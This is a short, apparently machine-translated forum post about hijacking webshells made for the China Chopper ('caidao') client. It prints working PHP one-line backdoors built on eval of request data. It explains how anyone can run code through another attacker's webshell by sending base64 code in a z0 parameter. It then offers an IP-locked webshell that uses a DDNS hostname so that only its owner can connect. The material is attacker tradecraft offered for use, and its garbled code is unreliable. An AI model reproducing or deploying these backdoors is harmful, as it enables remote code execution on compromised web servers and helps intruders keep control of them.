Chinese kitchen knife maicaidao website management software 0day

Today, I tried the C/S WEB management software "caipao China" and found a fatal vulnerability.

Even if you set the password, use eval ($ _ REQUEST ['moyo ']);

However, if you do not know that the connection password is moyo, you can directly use your one-sentence backdoor.

Because the content passed by $ _ REQUEST ['moyo '] is @ eval (base64_decode ($ _ POST [z0]);

Direct access to/backdoor. php? Z0 = {BASE64 encrypted code} can execute the code.

I don't know whether it's a design defect or a backdoor that I intentionally leave.

If someone uses a password like a sentence, there is a trick to avoid your sentence being stolen.

Local Use of DDNS software such as peanut shells, for example, the assigned domain name is moyo.apiz.org

Then write a backdoor like this.

<? Php $ _ SERVER ['remote _ ADDR '] = gethostbyname ('moyo .apiz.org ')? @ Eval ($ _ REQUEST ['moyo ']): exit ('denied')?>
In this way, a single Backdoor can only be connected to your computer.